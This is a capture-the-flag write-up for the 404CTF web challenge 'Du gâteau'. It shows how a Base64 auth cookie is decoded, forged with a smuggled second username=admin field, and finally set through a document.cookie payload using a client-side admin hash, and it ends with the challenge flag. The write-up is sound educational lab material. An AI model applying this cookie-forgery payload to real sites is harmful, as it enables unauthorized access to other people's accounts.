# Du gâteau **Category:** Web - **Points:** 993 - **Difficulty :** Moyen - **Solves :** 94 **Description:**\ Nous avons découvert que **Hallebarde** utilisait une pâtisserie comme couverture pour leurs activités criminelles. Visitez leur site web et voyez si vous pouvez accéder à leurs secrets.\ [https://du-gateau.404ctf.fr](https://du-gateau.404ctf.fr/) **Solution:** To solve this challenge, we need to find how to bypass the cookie verification.\ When we are going on the webpage we can see a "normal" website :\ ![image](https://user-images.githubusercontent.com/91023285/174875445-3a0bf555-dbd5-4c9c-822e-3a535bb18524.png) When we try to access to the "*Espace d'administration*" page, we get this error message :\ ![image](https://user-images.githubusercontent.com/91023285/174875750-967e2a26-d267-4734-8869-438c86f3505f.png) To understand how the user cookie is generate, we fill the inputs of this page (username : *test* / password : *1234*) :\ ![image](https://user-images.githubusercontent.com/91023285/174876307-c5db9f39-5a79-4c17-85a8-5904f3b3d94e.png) We get this cookie : `auth=dXNlcm5hbWU9dGVzdDtwYXNzd29yZD1kNDA0NTU5ZjYwMmVhYjZmZDYwMmFjNzY4MGRhY2JmYWFkZDEzNjMwMzM1ZTk1MWYwOTdhZjM5MDBlOWRlMTc2YjZkYjI4NTEyZjJlMDAwYjlkMDRmYmE1MTMzZThiMWM2ZThkZjU5ZGIzYThhYjlkNjBiZTRiOTdjYzllODFkYg==;` who is encoded on Base64.\ When we decipher it, we get this : `username=test;password=d404559f602eab6fd602ac7680dacbfaadd13630335e951f097af3900e9de176b6db28512f2e000b9d04fba5133e8b1c6e8df59db3a8ab9d60be4b97cc9e81db` with the good user (*test*) and the password encrypted with *sha-512*. Now we need to make the site believe that we are logging in as admin with this cookie format: `username=Ayweth20;password=46a72ac861e946e09419cf10786d092e283c60fba5fa78ab7bd55d77d3d7a80ef3d98b7f155556f4e9f5b5593485295872fc6bdf695263f62133be16271ef69d;username=admin;password=`. With this method the site will check the first username (test) and the password but in reality we will connect with the second username (admin). We convert this cookie in Base64 and send it to the website :\ ![image](https://user-images.githubusercontent.com/91023285/175650712-ca8a4bc2-eb40-479d-980c-ccfdec445c3e.png)\ ![image](https://user-images.githubusercontent.com/91023285/175650797-8d901651-f9e0-4fb9-ba5d-6a8d4610eb70.png) Now we are connected the *admin* account 🤩\ We can access to the *Mot de passe oublié* webpage to try to find the account password. But after some tests, we are looking that the password are very difficult to find.\ And when we click on the submit button we can't see any request in the traffic. So that means that the verification is doing on user side (and so maybe we will find the password hash).\ Yes that's good. When we try to find the password, the webpage code contain this function (with the good hash) :\ ![image](https://user-images.githubusercontent.com/91023285/175654840-74fe89a9-ece6-4a13-bee1-564f8ad9b722.png) Now we have the username : *admin* and the password hash : *66651013935b4c2c31d9baba8fa5d37b809b10da453f293ec8f9a7fbb2ab2e2c1d69dc8d80969508028b5ec14e9d1de585929a4c0d534996744b495c325e3f3d*\ ![image](https://user-images.githubusercontent.com/91023285/175655622-14baa883-151b-448c-a823-aa263a5c2825.png) Damn ! This method not work... 😢\ After the end of the CTF, I search an other writeup to understand how to finish the challenge. I saw on this [writeup](https://blog.reinom.com/story/ctf/ctf4042022/web/gateau/) that I miss just one `=` at the end of the cookie.\ The good cookie is : `document.cookie="auth=" + btoa("username=admin;password=66651013935b4c2c31d9baba8fa5d37b809b10da453f293ec8f9a7fbb2ab2e2c1d69dc8d80969508028b5ec14e9d1de585929a4c0d534996744b495c325e3f3d") + "=;";`.\ ![image](https://user-images.githubusercontent.com/91023285/175657932-c79d22a7-787b-49da-a4a5-a98bf0c93451.png)
🚩 FLAG ``` 404CTF{m3f13Z_V0Us_D3s_MdP_D4nS_L3s_c00k13s!} ```